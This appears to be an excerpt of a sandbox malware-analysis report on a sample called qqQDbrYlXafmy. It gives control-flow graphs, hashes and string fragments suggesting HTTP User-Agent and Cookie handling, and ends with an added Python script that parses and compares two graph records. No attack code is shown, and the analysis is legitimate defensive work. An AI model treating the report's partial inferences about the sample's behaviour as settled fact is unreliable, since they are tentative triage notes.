                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 3b883074fb3a4a4efb01e8a830865175f728be6058f19d636006667d61ccd0f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: C05192315443989FEF139F61CC85B9977B8EF04744F0401E9BA49FE0D6DAB09A90CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 ee14bc-ee1590 call ee14de call ee0c9c call ee1345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction ID: 8feeca0cfe8628997307a84226603dfcaecb69221f2341d4ddaf02f148b22a89
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD2124724046589EDF03AF60C9C9CA773ECEF40704F4505AAAD85EF049FE709194CAE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 58 ee1345-ee1352 59 ee13eb-ee13ec 58->59 60 ee1358-ee135e 58->60 60->59 61 ee1364-ee137a 60->61 61->59 63 ee137c-ee138f 61->63 65 ee1391-ee1398 63->65 66 ee139b-ee13ab call ee0e7c 65->66 69 ee13ad-ee13e2 66->69 69->59
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 9d4556ed828c95edfebf30ce3b97810a9faa26ecc294f1ae4b1dc6313f54dbe1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F921C03190425AAFDB119FB9C845B5DBBB5AF04300F054265FD55BB594D770E800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
control_flow_graph 70 ee14de-ee1590 call ee3653 call ee0c9c call ee1345 * 6
Memory Dump Source
• Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: cad74ae53a12959c0d32a88463ac8be05740e48b0529743181896a59c1eefe72
• Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction Fuzzy Hash: 1511D3724045589EEF03AF70C5C9CAA73ECEF40704B450AAAAD85EF44EFE709194CAE5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 88 ee3f0d-ee3f29 call ee3653 call ee379f 93 ee3f3b-ee3f66 call ee3f78 * 3 88->93 94 ee3f2b-ee3f39 call ee401b 88->94 107 ee3f71 93->107 102 ee3f76-ee3f77 94->102 107->102 108 ee3f71 call ee3f78 107->108 108->102
Memory Dump Source
• Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction ID: 2a8619193d0bbb21e4aa219fef2aefff59917c7269267b82a73d9add1b1c3c06
• Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
• Instruction Fuzzy Hash: C2F01270A982C8A6EF403B728C4F69936F45F40705F042591BA49BF0D6DE708650DE75
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 109 ee4674-ee468d call ee3a1c 112 ee468f-ee4698 call ee3a6e 109->112 113 ee469d-ee46cd 109->113 112->113 116 ee47e7-ee47ec 113->116 117 ee46d3-ee46f5 113->117 117->116 119 ee46fb-ee4720 117->119 121 ee4738-ee475a 119->121 122 ee4722-ee4737 119->122 124 ee47bf-ee47c9 121->124 125 ee475c-ee477e 121->125 122->121 126 ee47cb-ee47dd call ee3673 124->126 127 ee47e0-ee47e5 124->127 125->124 131 ee4780-ee47a2 125->131 126->127 127->116 131->124 133 ee47a4-ee47bc 131->133 133->124
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: faa040c0f205030a530cd5e8ff3cdfbe1d0ed7eefc94c835a1de919e6633f3f9
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 144164B6500248BFEF129FA5CC48BDEBBBAEF80704F154069EA44BA254D7309650CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 134 ee4675-ee4680 135 ee468b-ee468d 134->135 136 ee4686 call ee3a1c 134->136 137 ee468f-ee4698 call ee3a6e 135->137 138 ee469d-ee46cd 135->138 136->135 137->138 141 ee47e7-ee47ec 138->141 142 ee46d3-ee46f5 138->142 142->141 144 ee46fb-ee4720 142->144 146 ee4738-ee475a 144->146 147 ee4722-ee4737 144->147 149 ee47bf-ee47c9 146->149 150 ee475c-ee477e 146->150 147->146 151 ee47cb-ee47dd call ee3673 149->151 152 ee47e0-ee47e5 149->152 150->149 156 ee4780-ee47a2 150->156 151->152 152->141 156->149 158 ee47a4-ee47bc 156->158 158->149
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 5fd415bd397c133f12a0f7618e82ac3f1ed3797954ee7136152bc536192ba971
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 054163B6500248BFEF125FA5CC48BDEBBBAEF80704F154069EA44BA294D7309A50CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 0 2d3093e-2d3095f call 2d30cc4 call 2d314bc call 2d33cc0 8 2d30967-2d30989 0->8 10 2d30af1-2d30af2 8->10 11 2d3098f-2d309d2 call 2d309d9 8->11 15 2d309d4-2d309d5 11->15 16 2d30a3d-2d30a76 11->16 18 2d309d7-2d309e8 call 2d33653 15->18 19 2d30a3c 15->19 17 2d30a7e-2d30a80 16->17 20 2d30a82-2d30aae 17->20 21 2d30aec call 2d30af3 17->21 18->21 30 2d309ee-2d30a10 18->30 19->16 20->21 27 2d30ab0-2d30abc 20->27 21->10 31 2d30ac1-2d30ae5 27->31 30->21 34 2d30a16-2d30a3b 30->34 31->10 37 2d30ae7-2d30aea 31->37 34->21 38 2d30a41-2d30a76 34->38 37->21 37->31 38->17
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 849468fec9f7453cbc25eb71ffb4a0633e76873246bed3a94dfea32efc3a4019
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: F0518F316482549FEB239F20CC85B9A77BCEF04744F0801D9FA49FE1D6DBB09A94CA65
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 39 2d314bc-2d31590 call 2d314de call 2d30c9c call 2d31345 * 6
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction ID: ab33c831861c441f8135baddd07f7ad0dffe48416a06f8adce800c3971cab41c
• Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
• Instruction Fuzzy Hash: D221FA724046249EDF03AF60C9C88A673ECEF40704F45096A99C9EF049FE709554CEF6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 58 2d31345-2d31352 59 2d313eb-2d313ec 58->59 60 2d31358-2d3135e 58->60 60->59 61 2d31364-2d3137a 60->61 61->59 63 2d3137c-2d3138f 61->63 65 2d31391-2d31398 63->65 66 2d3139b-2d313ab call 2d30e7c 65->66 69 2d313ad-2d313e2 66->69 69->59
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: db3d2522bb4ffa16910e4fa9ce89517245fcf5f54b70cc8d9baf55647e45c9da
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 36219031A04216AFDF129F78C844B5DBBB5AF04704F094215FD59BB694D770EC10CBA4
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 70 2d314de-2d31590 call 2d33653 call 2d30c9c call 2d31345 * 6
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction ID: bd3c1c02b5e77d58f7a9dd5812d166b939635e0a919cea16ad22a576bbdf2f69
• Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction Fuzzy Hash: 7F1160724046259EEF03AF60C5C88AA73ECEE40708F8509BA9DC9EE549FE709554CEF5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (block id: address range, call targets, successor blocks)
• 88: 2d33f0d-2d33f29, calls 2d33653, 2d3379f -> 93, 94
• 93: 2d33f3b-2d33f66, calls 2d33f78 (x3) -> 107
• 94: 2d33f2b-2d33f39, calls 2d3401b -> 101
• 107: 2d33f71 -> 101, 108
• 108: 2d33f71, calls 2d33f78 -> 101
• 101: 2d33f76-2d33f77 (no successors)
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 30dc8b5bb391ccc07b0885eee5b373bab253bf4c07e535fe1f7d85fcf8abdb83
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: A5F01C70588280AAFF823BB0CE4965937B9EF40786F4405D1AA89ED2D4DE74CD50CEF5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (block id: address range, call targets, successor blocks)
• 134: 2d34675-2d3468d, calls 2d33a1c -> 137, 138
• 137: 2d3468f-2d34698, calls 2d33a6e -> 138
• 138: 2d3469d-2d346cd -> 141, 142
• 141: 2d346d3-2d346f5 -> 142, 144
• 142: 2d347e7-2d347ec (no successors)
• 144: 2d346fb-2d34720 -> 146, 147
• 146: 2d34722-2d34737 -> 147
• 147: 2d34738-2d3475a -> 149, 150
• 149: 2d347bf-2d347c9 -> 151, 152
• 150: 2d3475c-2d3477e -> 149, 156
• 151: 2d347e0-2d347e5 -> 142
• 152: 2d347cb-2d347dd, calls 2d33673 -> 151
• 156: 2d34780-2d347a2 -> 149, 158
• 158: 2d347a4-2d347bc -> 149
Strings
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: bcfd9571be42433c5c55ce09ff855047655062545a78ddfb19883353c6e08b64
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: AC4163B6500208BFEF125FA5CC48BDEBFBAEF84704F154069EA44AA254DB74DA50CF94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (block id: address range, call targets, successor blocks)
• 109: 2d34674-2d34680 -> 110, 111
• 110: 2d3468b-2d3468d -> 112, 113
• 111: 2d34686, calls 2d33a1c -> 110
• 112: 2d3468f-2d34698, calls 2d33a6e -> 113
• 113: 2d3469d-2d346cd -> 116, 117
• 116: 2d346d3-2d346f5 -> 117, 119
• 117: 2d347e7-2d347ec (no successors)
• 119: 2d346fb-2d34720 -> 121, 122
• 121: 2d34722-2d34737 -> 122
• 122: 2d34738-2d3475a -> 124, 125
• 124: 2d347bf-2d347c9 -> 126, 127
• 125: 2d3475c-2d3477e -> 124, 131
• 126: 2d347e0-2d347e5 -> 117
• 127: 2d347cb-2d347dd, calls 2d33673 -> 126
• 131: 2d34780-2d347a2 -> 124, 133
• 133: 2d347a4-2d347bc -> 124
Strings
Memory Dump Source
• Source File: 0000002C.00000002.2920286186.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2d30000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: c8735c36cc2d790531b0d3adc4d71ca34f146f714da8dac9b6be63c25ab41e46
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 454153B6500208BFEF129FA5CC44BDEBBBAEF84704F154059EA44AA254D774DA50CF94
Uniqueness
Uniqueness Score: -1.00%
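The two records that carry the String ID -Age$Cook$User$ie: $nt: (the graphs rooted at 2d34675 and 2d34674) print almost the same block list, and the 4-byte string fragments reassemble to the header names User-Agent: and Cookie:, which points at HTTP request-header handling. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's control_flow_graph edge lists into blocks and edges and shows that the two records are two decodings of one function that disagree only before 2d3468f. The parser, the Block and CFG names and the assumed token grammar (decimal node id followed by a hex range, call <addr>, * <n> for a repeated call, src->dst for an edge) are mine, inferred from how the report prints the graphs; the three graph strings are copied verbatim from the records above.

```python
"""Parse Joe Sandbox 'control_flow_graph' edge lists and compare two records.

Added example; not part of the Joe Sandbox report or of the sample.
Assumed token grammar (inferred from how the report prints the graphs):
  <node-id> <start>[-<end>] (call <addr> [* <n>])*   defines a basic block
  <src>-><dst>                                       defines an edge
Node ids are decimal, addresses are hex, '* n' repeats the preceding call.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# The three graphs exactly as printed in the report (functions at 2d33f0d,
# 2d34675 and 2d34674 inside the 0x02D30000 memory dump).
CFG_2D33F0D = (
    "control_flow_graph 88 2d33f0d-2d33f29 call 2d33653 call 2d3379f "
    "93 2d33f3b-2d33f66 call 2d33f78 * 3 88->93 94 2d33f2b-2d33f39 "
    "call 2d3401b 88->94 107 2d33f71 93->107 101 2d33f76-2d33f77 "
    "94->101 107->101 108 2d33f71 call 2d33f78 107->108 108->101")
CFG_2D34675 = (
    "control_flow_graph 134 2d34675-2d3468d call 2d33a1c 137 2d3468f-2d34698 "
    "call 2d33a6e 134->137 138 2d3469d-2d346cd 134->138 137->138 141 "
    "2d346d3-2d346f5 138->141 142 2d347e7-2d347ec 138->142 141->142 144 "
    "2d346fb-2d34720 141->144 146 2d34722-2d34737 144->146 147 2d34738-2d3475a "
    "144->147 146->147 149 2d347bf-2d347c9 147->149 150 2d3475c-2d3477e "
    "147->150 151 2d347e0-2d347e5 149->151 152 2d347cb-2d347dd call 2d33673 "
    "149->152 150->149 156 2d34780-2d347a2 150->156 151->142 152->151 156->149 "
    "158 2d347a4-2d347bc 156->158 158->149")
CFG_2D34674 = (
    "control_flow_graph 109 2d34674-2d34680 110 2d3468b-2d3468d 109->110 111 "
    "2d34686 call 2d33a1c 109->111 112 2d3468f-2d34698 call 2d33a6e 110->112 "
    "113 2d3469d-2d346cd 110->113 111->110 112->113 116 2d346d3-2d346f5 "
    "113->116 117 2d347e7-2d347ec 113->117 116->117 119 2d346fb-2d34720 "
    "116->119 121 2d34722-2d34737 119->121 122 2d34738-2d3475a 119->122 "
    "121->122 124 2d347bf-2d347c9 122->124 125 2d3475c-2d3477e 122->125 126 "
    "2d347e0-2d347e5 124->126 127 2d347cb-2d347dd call 2d33673 124->127 "
    "125->124 131 2d34780-2d347a2 125->131 126->117 127->126 131->124 133 "
    "2d347a4-2d347bc 131->133 133->124")


@dataclass
class Block:
    node_id: int
    start: int
    end: int                        # equals start for a single-instruction block
    calls: List[int] = field(default_factory=list)


@dataclass
class CFG:
    blocks: Dict[int, Block]
    edges: List[Tuple[int, int]]


def parse_cfg(text: str) -> CFG:
    """Turn one 'control_flow_graph ...' line into blocks and edges."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                       # edge: src->dst
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                   # call target inside the current block
            if cur is None:
                raise ValueError("call before any block definition")
            cur.calls.append(int(tokens[i + 1], 16))
            i += 2
        elif tok == "*":                      # '* n': the preceding call occurs n times
            if cur is None or not cur.calls:
                raise ValueError("'*' without a preceding call")
            cur.calls.extend([cur.calls[-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        elif tok.isdigit():                   # new block: decimal id, then hex range
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)
            cur = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[cur.node_id] = cur
            i += 2
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
    return CFG(blocks, edges)


def successors(cfg: CFG, node_id: int) -> List[int]:
    return sorted(dst for src, dst in cfg.edges if src == node_id)


def compare_ranges(a: CFG, b: CFG):
    """Return (shared, only_a, only_b) block address ranges, each sorted."""
    ra = {(blk.start, blk.end) for blk in a.blocks.values()}
    rb = {(blk.start, blk.end) for blk in b.blocks.values()}
    return sorted(ra & rb), sorted(ra - rb), sorted(rb - ra)


def resync_address(a: CFG, b: CFG) -> int:
    """Lowest address from which both decodings agree on block boundaries."""
    shared, _, _ = compare_ranges(a, b)
    return min(start for start, _ in shared)


if __name__ == "__main__":
    g1, g3, g4 = (parse_cfg(t) for t in (CFG_2D33F0D, CFG_2D34675, CFG_2D34674))
    for g in (g1, g3, g4):
        print(f"{len(g.blocks)} blocks, {len(g.edges)} edges")
    shared, only3, only4 = compare_ranges(g3, g4)
    print(f"shared blocks: {len(shared)}, resync at {resync_address(g3, g4):x}")
    for s, e in only3 + only4:
        print(f"  differs: {s:x}-{e:x}")
```

Run directly, the script reports that the only ranges which differ are 2d34675-2d3468d on one side and 2d34674-2d34680, 2d34686 and 2d3468b-2d3468d on the other: the two records start one byte apart and agree on every block from 2d3468f onward, so they should be triaged as one function, not two. The call targets they share (2d33a1c, 2d33a6e, 2d33673) are the natural next functions to look up in the report.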